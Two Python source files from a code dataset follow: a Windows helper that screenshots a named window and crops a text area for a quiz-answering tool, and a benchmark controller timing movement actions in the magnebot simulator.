6e4269d20691bbcaf70cd315b27ff53c65700a19 | 2,161 | py | Python | core/windows.py | 9526xu/wenda-helper | ee61f480da42002f53345529d0c37f6fb122a3a2 | [
"MIT"
] | 2 | 2019-12-13T06:31:38.000Z | 2020-03-17T07:20:57.000Z | core/windows.py | 9526xu/wenda-helper | ee61f480da42002f53345529d0c37f6fb122a3a2 | [
"MIT"
] | 5 | 2021-03-18T20:24:53.000Z | 2022-01-13T00:42:04.000Z | core/windows.py | 9526xu/wenda-helper | ee61f480da42002f53345529d0c37f6fb122a3a2 | [
"MIT"
] | 3 | 2018-03-15T05:25:38.000Z | 2020-10-13T04:09:11.000Z | # -*- coding: utf-8 -*-
"""
capture the VM screen
then use hanwang text recognize the text
then use baidu to search answer
"""
import ctypes
import os
import time
import win32gui
import win32com.client
import win32con
from PIL import Image, ImageGrab
class RECT(ctypes.Structure):
_fields_ = [('left', ctypes.c_long),
('top', ctypes.c_long),
('right', ctypes.c_long),
('bottom', ctypes.c_long)]
def __str__(self):
return str((self.left, self.top, self.right, self.bottom))
def analyze_current_screen_text(label,directory="."):
"""
capture the VM screen now
:return:
"""
# print("capture time: ", datetime.now().strftime("%H:%M:%S"))
hld = win32gui.FindWindow(None, label)
if hld > 0:
screenshot_filename = "screenshot.png"
save_text_area = os.path.join(directory, "text_area.png")
capture_screen(hld,screenshot_filename, directory)
parse_answer_area(os.path.join(directory, screenshot_filename), save_text_area)
return get_area_data(save_text_area)
else:
print('咦,你没打开'+label+'吧!')
def capture_screen(hld,filename="screenshot.png", directory="."):
win32gui.ShowWindow(hld, win32con.SW_RESTORE)
shell = win32com.client.Dispatch("WScript.Shell")
shell.SendKeys('%')
win32gui.SetForegroundWindow(hld)
time.sleep(1)
rect = RECT()
ctypes.windll.user32.GetWindowRect(hld,ctypes.byref(rect))
rangle = (rect.left,rect.top,rect.right,rect.bottom)
im = ImageGrab.grab(rangle)
im.save(os.path.join(directory, filename))
def parse_answer_area(source_file, text_area_file):
"""
crop the answer area
:return:
"""
image = Image.open(source_file)
wide = image.size[0]
# print("screen width: {0}, screen height: {1}".format(image.size[0], image.size[1]))
region = image.crop((0, 100, wide, 500))
region.save(text_area_file)
def get_area_data(text_area_file):
"""
:param text_area_file:
:return:
"""
with open(text_area_file, "rb") as fp:
image_data = fp.read()
return image_data
return "" | 25.72619 | 89 | 0.649236 |
e809fa3da29481d331bcc8c16cfde7a471689892 | 2,082 | py | Python | controllers/tests/benchmark/benchmark.py | neuroailab/magnebot | 3f537fcd95685efeadf7200208a310a4c6a2f10c | [
"MIT"
] | null | null | null | controllers/tests/benchmark/benchmark.py | neuroailab/magnebot | 3f537fcd95685efeadf7200208a310a4c6a2f10c | [
"MIT"
] | null | null | null | controllers/tests/benchmark/benchmark.py | neuroailab/magnebot | 3f537fcd95685efeadf7200208a310a4c6a2f10c | [
"MIT"
] | null | null | null | from typing import List
from time import time
from magnebot.test_controller import TestController
class Benchmark(TestController):
"""
Run simple benchmarks for the average speed of an action.
In an actual use-case, the action will usually be somewhat slower because of the complexity of the scene.
"""
def __init__(self, port: int = 1071, screen_width: int = 256, screen_height: int = 256):
super().__init__(port=port, screen_height=screen_height, screen_width=screen_width)
self._debug = False
def move_fps(self) -> float:
"""
Benchmark the speed of `move_by()`.
:return: The average time elapsed per action.
"""
self.init_scene()
return self._get_move_fps()
def turn_fps(self) -> float:
"""
Benchmark the speed of `turn_by()`.
:return: The average time elapsed per action.
"""
self.init_scene()
times: List[float] = list()
for i in range(20):
t0 = time()
self.turn_by(45)
times.append(time() - t0)
return sum(times) / len(times)
def step_fps(self) -> None:
print("| Skipped frames | Time elapsed |\n| --- | --- |")
for frames in [0, 5, 10, 15, 20]:
self.init_scene()
self._skip_frames = frames
t = self._get_move_fps()
print(f"| {frames} | {t} |")
def _get_move_fps(self) -> float:
"""
Move backwards and forwards and get the average time elapsed per action.
:return: The average time elapsed of the action.
"""
times: List[float] = list()
direction = 1
for i in range(20):
if i > 0 and i % 5 == 0:
direction *= -1
t0 = time()
self.move_by(0.5 * direction)
times.append(time() - t0)
return sum(times) / len(times)
if __name__ == "__main__":
m = Benchmark()
print(f"turn_by(): {m.turn_fps()}")
print(f"move_by(): {m.move_fps()}")
m.step_fps()
m.end()
| 27.76 | 109 | 0.561479 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.